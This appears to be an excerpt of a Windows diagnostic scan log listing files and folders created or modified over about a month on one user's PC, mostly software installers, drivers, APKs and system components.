2022-04-11 15:20 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsMicrosoft Office Tools
2022-04-11 15:20 - 2022-04-11 15:20 - 000002451 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsWord.lnk
2022-04-11 15:20 - 2022-04-11 15:20 - 000002450 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsPowerPoint.lnk
2022-04-11 15:20 - 2022-04-11 15:20 - 000002414 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsAccess.lnk
2022-04-11 15:20 - 2022-04-11 15:20 - 000002413 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsExcel.lnk
2022-04-11 15:20 - 2022-04-11 15:20 - 000002407 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsOutlook.lnk
2022-04-11 15:20 - 2022-04-11 15:20 - 000002401 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsPublisher.lnk
2022-04-11 15:20 - 2022-04-11 15:20 - 000002393 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsOneNote.lnk
2022-04-11 15:20 - 2022-04-11 15:20 - 000000000 ____D C:Program FilesCommon FilesDESIGNER
2022-04-11 15:19 - 2022-04-20 20:44 - 000000000 ____D C:Program FilesMicrosoft Office
2022-04-11 15:19 - 2022-04-11 15:19 - 000000000 ____D C:Program FilesMicrosoft Office 15
2022-04-11 04:26 - 2022-04-11 04:26 - 000199913 _____ C:UsersPhenomDownloadschromepass.zip
2022-04-11 04:12 - 2022-04-27 23:22 - 000002364 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsBrave.lnk
2022-04-11 04:12 - 2022-04-27 23:22 - 000002323 _____ C:UsersPublicDesktopBrave.lnk
2022-04-11 04:12 - 2022-04-11 04:12 - 000000000 ____D C:UsersPhenomAppDataLocalBraveSoftware
2022-04-11 04:12 - 2022-04-11 04:12 - 000000000 ____D C:Program FilesBraveSoftware
2022-04-11 04:12 - 2022-04-11 04:12 - 000000000 ____D C:Program Files (x86)BraveSoftware
2022-04-11 04:11 - 2022-04-11 04:11 - 001293840 _____ (BraveSoftware Inc.) C:UsersPhenomDownloadsBraveBrowserSetup (1).exe
2022-04-11 01:21 - 2022-04-11 01:21 - 053984688 _____ (Advanced Micro Devices, Inc.) C:UsersPhenomDownloadsamd_chipset_software_4.03.03.431 (1).exe
2022-04-10 22:40 - 2022-04-10 22:40 - 004858012 _____ C:UsersPhenomDownloadsTwitchRecover.zip
2022-04-10 22:07 - 2022-04-28 18:18 - 000002098 __RSH C:ProgramDatantuser.pol
2022-04-10 00:54 - 2022-04-10 00:54 - 010174592 _____ (Martin Malik - REALiX ) C:UsersPhenomDownloadshwi_722.exe
2022-04-09 20:48 - 2022-04-09 20:48 - 000605067 _____ C:UsersPhenomDownloadsPana Vara Viitoare.ogg
2022-04-09 20:40 - 2022-04-09 20:40 - 000320411 _____ C:UsersPhenomDownloadsmp3DC236.exe
2022-04-09 20:40 - 2022-04-09 20:40 - 000001128 _____ C:UsersPhenomDesktopmp3DirectCut.lnk
2022-04-09 20:40 - 2022-04-09 20:40 - 000000000 ____D C:Program Files (x86)mp3DirectCut
2022-04-09 17:46 - 2022-04-26 18:07 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsGsmServer
2022-04-09 17:46 - 2022-04-09 17:46 - 000000000 ____D C:Program Files (x86)GsmServer
2022-04-09 17:20 - 2022-04-09 17:20 - 000000000 ____D C:UsersPhenomDocumentsSigmaKey
2022-04-09 16:56 - 2022-04-09 16:56 - 099824780 _____ C:UsersPhenomDownloadsVisual-C-Runtimes-All-in-One-Feb-2022.zip
2022-04-09 16:51 - 2022-04-09 16:51 - 070500361 _____ (GsmServer) C:UsersPhenomDownloadsSigmaKey_Software_Setup_v2.26.16.exe
2022-04-09 14:54 - 2022-04-09 14:54 - 117926544 _____ (OBS Project) C:UsersPhenomDownloadsOBS-Studio-27.2.1-Full-Installer-x64 (1).exe
2022-04-09 14:47 - 2022-04-09 14:48 - 117926544 _____ (OBS Project) C:UsersPhenomDownloadsOBS-Studio-27.2.1-Full-Installer-x64.exe
2022-04-09 14:36 - 2022-04-09 14:36 - 000176141 _____ C:UsersPhenomDownloadslogs (1).rar
2022-04-09 14:24 - 2022-04-09 14:24 - 117961440 _____ (OBS Project) C:UsersPhenomDownloadsOBS-Studio-27.2.4-Full-Installer-x64.exe
2022-04-09 14:12 - 2022-04-09 14:12 - 000528208 _____ C:UsersPhenomDownloadslogs.rar
2022-04-09 14:03 - 2022-04-15 14:18 - 000000000 ____D C:Program Filesobs-studio
2022-04-09 14:02 - 2022-04-09 14:02 - 090640720 _____ (obsproject.com) C:UsersPhenomDownloadsOBS-Studio-27.1.3-Full-Installer-x64.exe
2022-04-09 01:50 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsVideoLAN
2022-04-09 01:50 - 2022-04-21 01:33 - 000000916 _____ C:UsersPublicDesktopVLC media player.lnk
2022-04-09 01:49 - 2022-04-09 01:49 - 113409498 _____ C:UsersPhenomDownloadsvlc-3.0.17.4-win64-release.7z
2022-04-09 01:49 - 2022-04-09 01:49 - 042762464 _____ C:UsersPhenomDownloadsvlc-3.0.16-win64 (2).exe
2022-04-08 04:16 - 2022-04-27 01:29 - 000000000 ____D C:Program Files (x86)F-Secure
2022-04-08 02:30 - 2022-04-08 02:30 - 064286208 _____ C:UsersPhenomDownloadsvlc-4.0.0-dev-win64-caf66c91.msi
2022-04-08 02:30 - 2022-04-08 02:30 - 050064901 _____ C:UsersPhenomDownloadsvlc-4.0.0-dev-win64-caf66c91.exe
2022-04-08 01:38 - 2022-04-08 01:38 - 052731974 _____ C:UsersPhenomDownloadsfsecure_freedome_vpn_2.47.927.zip
2022-04-07 19:56 - 2022-04-07 19:56 - 005234297 _____ C:UsersPhenomDownloadsapp-debug (7).apk
2022-04-07 19:55 - 2022-04-07 19:55 - 000011445 _____ C:UsersPhenomDownloadsbindings (4).json
2022-04-07 19:36 - 2022-04-07 19:36 - 005234389 _____ C:UsersPhenomDownloadsapp-debug (3).apk
2022-04-07 19:36 - 2022-04-07 19:36 - 000011192 _____ C:UsersPhenomDownloadsbindings (3).json
2022-04-07 19:26 - 2022-04-07 19:26 - 005234829 _____ C:UsersPhenomDownloadsapp-debug (2).apk
2022-04-07 19:26 - 2022-04-07 19:26 - 000011445 _____ C:UsersPhenomDownloadsbindings (2).json
2022-04-07 19:15 - 2022-04-07 19:15 - 005233237 _____ C:UsersPhenomDownloadsapp-debug (1).apk
2022-04-07 19:15 - 2022-04-07 19:15 - 000011445 _____ C:UsersPhenomDownloadsbindings (1).json
2022-04-07 18:42 - 2022-04-07 18:42 - 000421251 _____ C:UsersPhenomDownloadsSnapMod-1.2.2.zip
2022-04-07 03:46 - 2022-04-07 03:46 - 005241536 _____ (Easeware ) C:UsersPhenomDownloadsDriverEasy_Setup (3).exe
2022-04-07 02:16 - 2022-04-07 02:16 - 000000000 ____D C:UsersPhenomAppDataLocalvlc
2022-04-07 02:15 - 2022-04-07 02:15 - 050156829 _____ C:UsersPhenomDownloadsvlc-4.0.0-dev-win64-9f1a32a0.exe
2022-04-07 01:13 - 2022-04-07 01:13 - 005232469 _____ C:UsersPhenomDownloadsapp-debug (6).apk
2022-04-07 01:04 - 2022-04-07 01:04 - 091794208 _____ C:UsersPhenomDownloadscom.snapchat.android_11.73.0.35-84586_minAPI19(arm64-v8a)(nodpi)_apkmirror.com.apk
2022-04-07 01:04 - 2022-04-07 01:04 - 086724931 _____ C:UsersPhenomDownloadscom.snapchat.android_11.73.0.35-84586_minAPI19(armeabi-v7a)(nodpi)_apkmirror.com.apk
2022-04-07 00:59 - 2022-04-07 00:59 - 000011445 _____ C:UsersPhenomDownloadsbindings (6).json
2022-04-07 00:58 - 2022-04-07 00:58 - 005234693 _____ C:UsersPhenomDownloadsapp-debug (5).apk
2022-04-07 00:16 - 2022-04-07 00:16 - 000011192 _____ C:UsersPhenomDownloadsbindings (5).json
2022-04-07 00:15 - 2022-04-07 00:15 - 005232469 _____ C:UsersPhenomDownloadsapp-debug (4).apk
2022-04-06 19:16 - 2022-04-06 19:17 - 000057440 _____ C:UsersPhenomDownloadsLSPosed_2022-04-06T19_14_46.219.zip
2022-04-06 17:44 - 2022-04-06 19:09 - 000011192 _____ C:UsersPhenomDownloadsbindings.json
2022-04-06 01:25 - 2022-04-22 13:46 - 000000000 ____D C:Program FilesFirefox Nightly
2022-04-05 18:59 - 2022-04-05 19:00 - 825175568 _____ (NVIDIA Corporation) C:UsersPhenomDownloads512.15-desktop-win10-win11-64bit-international-dch-whql.exe
2022-04-05 18:58 - 2022-04-05 18:58 - 001261730 _____ C:UsersPhenomDownloads[Guru3D.com]-DDU (2).zip
2022-04-05 18:58 - 2022-04-05 18:58 - 001261730 _____ C:UsersPhenomDownloads[Guru3D.com]-DDU (1).zip
2022-04-05 16:56 - 2022-04-05 16:56 - 000000350 _____ C:UsersPhenomDesktopRocket League®.url
2022-04-05 16:34 - 2022-04-05 16:34 - 000000000 ____D C:UsersPhenomAppDataLocalUnrealEngineLauncher
2022-04-05 16:34 - 2022-04-05 16:34 - 000000000 ____D C:UsersPhenomAppDataLocalUnrealEngine
2022-04-05 16:34 - 2022-04-05 16:34 - 000000000 ____D C:UsersPhenomAppDataLocalEpicGamesLauncher
2022-04-05 16:33 - 2022-04-05 16:35 - 000000000 ____D C:ProgramDataEpic
2022-04-05 16:33 - 2022-04-05 16:33 - 000001270 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsEpic Games Launcher.lnk
2022-04-05 16:33 - 2022-04-05 16:33 - 000001258 _____ C:UsersPublicDesktopEpic Games Launcher.lnk
2022-04-05 16:33 - 2022-04-05 16:33 - 000000000 ____D C:UsersPhenomAppDataLocalEpic Games
2022-04-05 16:33 - 2022-04-05 16:33 - 000000000 ____D C:Program Files (x86)Epic Games
2022-04-05 16:29 - 2022-04-05 16:29 - 158863360 _____ C:UsersPhenomDownloadsEpicInstaller-13.3.0.msi
2022-04-04 22:02 - 2022-04-04 22:02 - 008369999 _____ C:UsersPhenomDownloadsdxvk-master-7ea41309d5f9e028d646bf569152879b5ec4295a.zip
2022-04-04 21:18 - 2022-04-04 21:18 - 008370142 _____ C:UsersPhenomDownloadsdxvk-master-e2989e68638c883f7bb61702b2930e3c05e0968b.zip
2022-04-04 20:53 - 2022-04-04 20:53 - 008370022 _____ C:UsersPhenomDownloadsdxvk-master-42747ebd16afe46461d93b0a45076af442ea10d0.zip
2022-04-04 20:34 - 2022-04-04 20:34 - 008370117 _____ C:UsersPhenomDownloadsdxvk-master-77992ef951e0c765785097aeea8014374d9a8282.zip
2022-04-04 18:13 - 2022-04-04 18:13 - 007722937 _____ C:UsersPhenomDownloadsd9vk-0.40.1.tar.gz
2022-04-02 01:19 - 2022-04-10 03:31 - 010681746 _____ C:UsersPhenomDownloadsapp-neo.apk
2022-04-01 16:36 - 2022-04-01 16:36 - 008369977 _____ C:UsersPhenomDownloadsdxvk-master-260f928dbcff7dce5e725e177240d5807c082743.zip
2022-04-01 03:58 - 2022-04-01 04:00 - 1270085632 _____ C:UsersPhenomDownloadsWin11_English_x64v1.iso
2022-03-31 23:06 - 2022-03-31 23:06 - 008507392 _____ C:UsersPhenomDownloadsC24RG5xFQ.exe
2022-03-31 23:01 - 2022-03-31 23:01 - 012202017 _____ C:UsersPhenomDownloads249f91c7-c196-48ed-bf19-8a634c006137_b35ab57440235d71ac9103f59fcea8a7c90866fa.cab
2022-03-31 22:58 - 2022-03-31 22:58 - 076059062 _____ C:UsersPhenomDownloadsUnofficial-Realtek-UAD-generic-6.0.9323.1 (1).zip
2022-03-31 22:57 - 2022-03-31 22:58 - 032977002 _____ C:UsersPhenomDownloadsRealtekAudioControl_1.35.269-offline (1).zip
2022-03-31 22:41 - 2022-03-31 22:41 - 029350975 _____ C:UsersPhenomDownloadsCCleaner 5.91.rar
2022-03-31 21:55 - 2022-03-31 21:55 - 035930248 _____ (TeamViewer Germany GmbH) C:UsersPhenomDownloadsTeamViewer_Setup_x64 (1).exe
2022-03-30 17:22 - 2022-03-30 17:24 - 000003924 _____ C:UsersPhenomDownloads272401865965305867.json

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-04-28 19:18 - 2022-01-19 22:28 - 000000000 ____D C:UsersPhenomAppDataRoamingqBittorrent
2022-04-28 18:43 - 2021-06-05 15:10 - 000000000 ____D C:ProgramDataregid.1991-06.com.microsoft
2022-04-28 18:29 - 2021-06-05 15:09 - 000000000 ____D C:WINDOWSINF
2022-04-28 18:27 - 2021-06-05 15:01 - 000065536 _____ C:WINDOWSsystem32configELAM
2022-04-28 18:25 - 2022-01-19 22:02 - 000000000 ____D C:Program Files (x86)Google
2022-04-28 18:23 - 2022-01-19 22:30 - 000000000 ____D C:ProgramDataNVIDIA
2022-04-28 18:23 - 2022-01-19 22:28 - 000000000 ____D C:UsersPhenomAppDataRoamingSamsung Magician
2022-04-28 18:23 - 2022-01-19 21:59 - 000000000 ____D C:UsersPhenomAppDataLocalD3DSCache
2022-04-28 18:23 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSystemTemp
2022-04-28 18:22 - 2021-12-23 16:17 - 000012288 ___SH C:DumpStack.log.tmp
2022-04-28 18:22 - 2021-06-05 15:01 - 000524288 _____ C:WINDOWSsystem32configBBI
2022-04-28 14:55 - 2022-01-19 22:27 - 000000000 ____D C:UsersPhenomAppDataLocalSquirrelTemp
2022-04-28 03:45 - 2022-01-19 22:28 - 000000000 ____D C:UsersPhenomAppDataRoamingvlc
2022-04-28 03:05 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSappcompat
2022-04-28 01:44 - 2022-01-19 21:59 - 000000000 ____D C:UsersPhenomAppDataLocalPackages
2022-04-28 01:19 - 2022-01-20 01:17 - 000000713 _____ C:WINDOWSsystem32Driversetchosts.ics
2022-04-28 01:15 - 2021-06-05 15:10 - 000000000 ___HD C:Program FilesWindowsApps
2022-04-28 01:15 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSAppReadiness
2022-04-27 21:51 - 2022-01-19 22:23 - 000000000 ____D C:UsersPhenomAppDataLocalNVIDIA
2022-04-27 17:19 - 2022-01-19 22:27 - 000000000 ____D C:UsersPhenomAppDataLocalNVIDIA Corporation
2022-04-27 17:18 - 2022-01-19 22:30 - 000001447 _____ C:UsersPublicDesktopGeForce Experience.lnk
2022-04-27 17:18 - 2022-01-19 22:30 - 000000000 ____D C:Program Files (x86)NVIDIA Corporation
2022-04-27 17:18 - 2022-01-19 22:00 - 000000000 ____D C:ProgramDataNVIDIA Corporation
2022-04-27 17:18 - 2022-01-19 22:00 - 000000000 ____D C:Program FilesNVIDIA Corporation
2022-04-27 03:41 - 2021-06-05 17:30 - 000000000 ____D C:Program FilesWindows Photo Viewer
2022-04-27 03:41 - 2021-06-05 17:30 - 000000000 ____D C:Program FilesWindows Defender Advanced Threat Protection
2022-04-27 03:41 - 2021-06-05 17:30 - 000000000 ____D C:Program Files (x86)Windows Photo Viewer
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___SD C:WINDOWSSysWOW64F12
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___SD C:WINDOWSsystem32UNP
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___SD C:WINDOWSsystem32F12
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___SD C:WINDOWSsystem32DiagSvcs
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___RD C:WINDOWSPrintDialog
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ___RD C:WINDOWSImmersiveControlPanel
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64setup
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64Dism
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64Com
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSystemResources
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32WinBioPlugIns
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32SystemResetPlatform
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32Sysprep
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32setup
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32oobe
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32Dism
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32Com
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32appraiser
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSPolicyDefinitions
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSIME
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSbcastdvr
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:Program FilesWindows Defender
2022-04-27 03:41 - 2021-06-05 15:10 - 000000000 ____D C:Program FilesCommon FilesSystem
2022-04-27 03:41 - 2021-06-05 15:01 - 000000000 ____D C:WINDOWSservicing
2022-04-27 00:34 - 2022-01-19 22:26 - 000000000 ____D C:UsersPhenomAppDataLocalCrashDumps
2022-04-27 00:18 - 2022-01-19 22:17 - 000000000 ____D C:UsersPhenomDownloadsTelegram Desktop
2022-04-26 23:57 - 2022-02-11 01:51 - 000000000 ____D C:WSA
2022-04-26 23:06 - 2021-06-05 15:01 - 000000000 ____D C:WINDOWSCbsTemp
2022-04-26 23:04 - 2021-06-05 15:08 - 000245760 _____ (Microsoft Corporation) C:WINDOWSsystem32msclmd.dll
2022-04-26 23:04 - 2021-06-05 15:08 - 000207360 _____ (Microsoft Corporation) C:WINDOWSSysWOW64msclmd.dll
2022-04-26 20:24 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32NDF
2022-04-26 19:58 - 2022-01-19 22:31 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsDiscord Inc
2022-04-26 19:48 - 2022-01-19 21:59 - 000000000 __RHD C:UsersPublicAccountPictures
2022-04-26 18:28 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSMedia
2022-04-26 18:27 - 2022-03-28 22:59 - 000000000 ____D C:Program FilesCommon Fileslogishrd
2022-04-26 18:27 - 2022-03-25 03:50 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsqBittorrent
2022-04-26 18:27 - 2022-03-25 02:45 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsHWiNFO64
2022-04-26 18:27 - 2022-03-22 23:53 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsDriversCloud.com
2022-04-26 18:27 - 2022-02-26 17:49 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsJava
2022-04-26 18:27 - 2022-02-24 16:03 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsWinRAR
2022-04-26 18:27 - 2022-02-24 16:03 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsWinRAR
2022-04-26 18:27 - 2022-02-19 03:56 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsmLogcat
2022-04-26 18:27 - 2022-02-16 03:09 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsCheat Engine 7.4
2022-04-26 18:27 - 2022-02-10 03:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsTextCrawler Pro
2022-04-26 18:27 - 2022-02-08 18:51 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsNode.js
2022-04-26 18:27 - 2022-01-31 16:57 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsGit
2022-04-26 18:27 - 2022-01-31 16:56 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsGitHub, Inc
2022-04-26 18:27 - 2022-01-22 23:53 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsOBS Studio
2022-04-26 18:27 - 2022-01-19 23:00 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsRiot Games
2022-04-26 18:27 - 2022-01-19 22:30 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsNVIDIA Corporation
2022-04-26 18:27 - 2022-01-19 22:13 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsAplicații Chrome Beta
2022-04-26 18:27 - 2022-01-19 22:03 - 000000000 ____D C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsTotal Commander
2022-04-26 18:27 - 2022-01-19 21:59 - 000000000 ____D C:WINDOWSsystem32DriversNVIDIA Corporation
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ___HD C:WINDOWSsystem32GroupPolicy
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSSysWOW64GroupPolicy
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32WinBioDatabase
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32Tasks_Migrated
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32spool
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSsystem32MsDtc
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSServiceState
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:WINDOWSLiveKernelReports
2022-04-26 18:27 - 2021-06-05 15:10 - 000000000 ____D C:Program FilesCommon Filesmicrosoft shared
2022-04-26 18:27 - 2021-06-05 15:08 - 000028672 _____ C:WINDOWSsystem32configBCD-Template
2022-04-26 18:24 - 2021-06-05 15:14 - 000000000 ____D C:WINDOWSSetup
2022-04-26 18:21 - 2021-06-05 15:10 - 000000000 ____D C:ProgramDataUSOPrivate
2022-04-26 18:07 - 2022-03-25 03:08 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsFinalWire
2022-04-26 18:07 - 2022-03-24 17:28 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsCPUID
2022-04-26 18:07 - 2022-02-17 22:56 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsStreamlabs
2022-04-26 18:05 - 2022-01-24 17:05 - 000000000 ____D C:UsersUserAppDataLocalPackages
2022-04-26 17:59 - 2021-06-05 15:21 - 000049464 _____ (Microsoft Corporation) C:WINDOWSsystem32UtilityVmSysprep.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000504144 _____ (Microsoft Corporation) C:WINDOWSsystem32NetMgmtIF.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000213328 _____ C:WINDOWSsystem32IsolatedWindowsEnvironmentUtils.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000192848 _____ C:WINDOWSsystem32HvsiSettingsWorker.exe
2022-04-26 17:59 - 2021-06-05 15:19 - 000139600 _____ C:WINDOWSsystem32nmscrub.exe
2022-04-26 17:59 - 2021-06-05 15:19 - 000119120 _____ (Microsoft Corporation) C:WINDOWSsystem32nmbind.exe
2022-04-26 17:59 - 2021-06-05 15:19 - 000114688 _____ C:WINDOWSsystem32hvsiproxyapp.exe
2022-04-26 17:59 - 2021-06-05 15:19 - 000094536 _____ (Microsoft Corporation) C:WINDOWSsystem32CmAgent.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000082256 _____ C:WINDOWSsystem32HvsiMachinePolicies.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000082248 _____ (Microsoft Corporation) C:WINDOWSsystem32Driversl2bridge.sys
2022-04-26 17:59 - 2021-06-05 15:19 - 000081920 _____ (Microsoft Corporation) C:WINDOWSsystem32CCGLaunchPad.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000069944 _____ C:WINDOWSsystem32AuditSettingsProvider.dll
2022-04-26 17:59 - 2021-06-05 15:19 - 000049488 _____ (Microsoft Corporation) C:WINDOWSsystem32Drivershnswfpdriver.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000401736 _____ (Microsoft Corporation) C:WINDOWSsystem32VmSynthNic.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000360784 _____ (Microsoft Corporation) C:WINDOWSsystem32vmiccore.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000356680 _____ (Microsoft Corporation) C:WINDOWSsystem32hcsdiag.exe
2022-04-26 17:59 - 2021-06-05 15:18 - 000311616 _____ (Microsoft Corporation) C:WINDOWSsystem32vmflexio.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000270672 _____ (Microsoft Corporation) C:WINDOWSsystem32CExecSvc.exe
2022-04-26 17:59 - 2021-06-05 15:18 - 000258384 _____ (Microsoft Corporation) C:WINDOWSsystem32vmbusvdev.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000250184 _____ (Microsoft Corporation) C:WINDOWSsystem32gpupvdev.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000233808 _____ (Microsoft Corporation) C:WINDOWSsystem32Driversvpcivsp.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000164176 _____ (Microsoft Corporation) C:WINDOWSsystem32vmvirtio.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000123208 _____ (Microsoft Corporation) C:WINDOWSsystem32vmwpevents.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000122880 _____ C:WINDOWSsystem32vmhbmgmt.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000119104 _____ (Microsoft Corporation) C:WINDOWSsystem32vmwpctrl.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000110904 _____ (Microsoft Corporation) C:WINDOWSsystem32wcsetupagent.exe
2022-04-26 17:59 - 2021-06-05 15:18 - 000090112 _____ C:WINDOWSsystem32Driversvmbusproxy.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000078144 _____ (Microsoft Corporation) C:WINDOWSsystem32Driversvhdparser.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000069968 _____ (Microsoft Corporation) C:WINDOWSsystem32Driverspassthruparser.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000069960 _____ (Microsoft Corporation) C:WINDOWSsystem32Driversvkrnlintvsc.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000069952 _____ (Microsoft Corporation) C:WINDOWSsystem32Driversvkrnlintvsp.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000061776 _____ (Microsoft Corporation) C:WINDOWSsystem32Drivershvsocketcontrol.sys
2022-04-26 17:59 - 2021-06-05 15:18 - 000049480 _____ (Microsoft Corporation) C:WINDOWSsystem32VrdUmed.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000049464 _____ (Microsoft Corporation) C:WINDOWSsystem32vmsifproxystub.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000041288 _____ (Microsoft Corporation) C:WINDOWSsystem32vmcomputeeventlog.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000036864 _____ (Microsoft Corporation) C:WINDOWSsystem32VmComputeProxy.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000024904 _____ (Microsoft Corporation) C:WINDOWSsystem32f989b52d-f928-44a3-9bf1-bf0c1da6a0d6_HyperV-DeviceVirtualization.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000024904 _____ (Microsoft Corporation) C:WINDOWSsystem32f1db7d81-95be-4911-935a-8ab71629112a_HyperV-IsolatedVM.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000024904 _____ (Microsoft Corporation) C:WINDOWSsystem32c4d66f00-b6f0-4439-ac9b-c5ea13fe54d7_HyperV-ComputeCore.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000024904 _____ (Microsoft Corporation) C:WINDOWSsystem32c28c7a4e-a619-4463-82b7-0fc9cc7187f5_HyperV-ComputeStorage.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000024896 _____ (Microsoft Corporation) C:WINDOWSsystem32d4d78066-e6db-44b7-b5cd-2eb82dce620c_HyperV-ComputeLegacy.dll
2022-04-26 17:59 - 2021-06-05 15:18 - 000006658 _____ C:WINDOWSsystem32VmFirmware Third-Party Notices.txt
2022-04-26 14:38 - 2022-01-19 21:59 - 000000000 ____D C:ProgramDataPackages
2022-04-26 03:36 - 2022-01-19 22:03 - 000000000 ____D C:Program FilesTotal Commander
2022-04-26 01:51 - 2022-01-20 01:41 - 000000000 ____D C:ProgramDataF-Secure
2022-04-26 01:51 - 2022-01-19 22:26 - 000000000 ____D C:UsersPhenomAppDataLocalF-Secure
2022-04-26 01:35 - 2022-01-20 01:34 - 000001486 _____ C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsOpera developer.lnk
2022-04-26 00:53 - 2022-01-19 23:20 - 000000000 ____D C:Program Files7-Zip
2022-04-25 23:09 - 2022-01-19 22:17 - 000002278 _____ C:UsersPhenomDesktopMicrosoft Edge.lnk
2022-04-25 18:11 - 2022-01-19 22:27 - 000000000 ____D C:UsersPhenomAppDataRoamingobs-studio
2022-04-23 23:34 - 2022-01-19 22:01 - 000000000 ____D C:UsersPhenomAppDataLocalPlaceholderTileLogoFolder
